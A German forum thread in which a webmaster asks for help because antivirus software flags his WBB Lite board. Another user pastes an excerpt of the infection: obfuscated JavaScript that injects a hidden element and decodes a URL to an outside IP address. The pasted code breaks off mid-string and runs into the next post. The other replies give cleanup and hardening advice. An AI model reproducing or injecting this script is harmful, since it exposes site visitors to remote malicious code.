Ich hab ein Problem… Seit gut einer Woche berichten mir User meines FOrums immer wieder, das bei Aufrufen der Seite die Virenscanner schreien, dass das Forum bedroht ist… Angeblich durch diverse Vieren und auch Trojaner…
Bei einem User wird die komplette Seite geblockt angeblich wegen Pornographie
Da ich absolut keine AHnung habe, was da los ist und auch net weiß wie ich event. Viren entfernen kann, such ich nun hier dringend um hilfe
Gibt es jemand der sich das ganze mal anschauen kann? der prüfen kann obs sauber ist oder mir sagen kann wie ich was verändern muss, damits aufhört?
Lieben Dank im vorraus
in mindestens einer Datei ist die Verseuchung.
Die mal nen Ausschnitt:
<body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('traEntweder ist dein PC verseucht und fügt an .php / html Dateien automatisch Viren, (und) oder dein FTP Account wurde gecrackt. Daher solltest du dringend deine Passwörter ändern.
Und mal deine Dateien durchsuchen
gut
passwörter ändern ist das kleinere problem… auf meinem PC befinden sich keine viren, da ich täglich alles sauber halte… daher denk ich problem 2 wäre logisch, da ich beobachtet habe das sich wochenlang ein Gast darum getrieben hat und versucht hat überall zu posten
frage…
wie mach ich das mit den daten sauber machen…
das was du da gepostet hast, soll ich das rauslöschen??? sorry bin gänzlich anfänger, das board hat mir vor einem jahr jemand aufgebaut den ich aber im moment nicht erreichen kann
ich suche immer noch dringend hilfe!! Die sache ist ernst und es wäre nett, wenn mir jemand helfen könnte… Die Jungs die hinter dem Ticker hocken sagten mir auch, ich soll mich hier melden…
wenn du als am suchen bist, ließe sich evtl. auch einfach die software neu aufspielen.
grundsätzlich müsste es aber in der header datei ausgegeben werden.
woher das zustande kommt, kA sry
es muss ja nicht direkt dort drin stehen, kann auch in irgendner anderen Datei stecken und wird
dann am ende beim ausführen der PHP datei dort generiert
ich schau mir das ganze mal genauer an, evtl. kann ich dir dann gezieltere Dateien/Infos nennen.
ciao
edit: ich sehe nichtsmehr derart im quellcode, evtl. einfach mal browsercache leeren und auch mal inner forensoftware, ich könnte mir vorstellen, dass ähnlich wie bei phpBB3 ein Cache verwendet wird, ich sehe z.Z. nichtsmehr
Denn wenn du ein Backup neu aufspielst, ist es nur eine Frage der Zeit bis du erneut gehackt wirst, weil die Lücke ja nicht behoben ist.
Vielleicht schaust du mal ob es schon eine neue Version deiner Forensoftware gibt, oder ob du unsichere Plugins verwendest. Vielleicht wäre auch ein .htaccess Verzeichnisschutz des Backends oder das Passwort ändern von einem anderen PC aus eine Lösung.
man weiß aber auch nicht wie sicher das passwort war, etc.
die Forensoftware ansich (ich rede ja auch von der Forensoftware und keinen exotischen modifikationskram irgendwelcher Script Kiddies) sollte schon soweit sicher sein, WBB Lite verwenden eig relativ viele noch z.Z. und das auch problemlos
jedoch ist die aktuellste version glaube Version 2 von WBB Lite.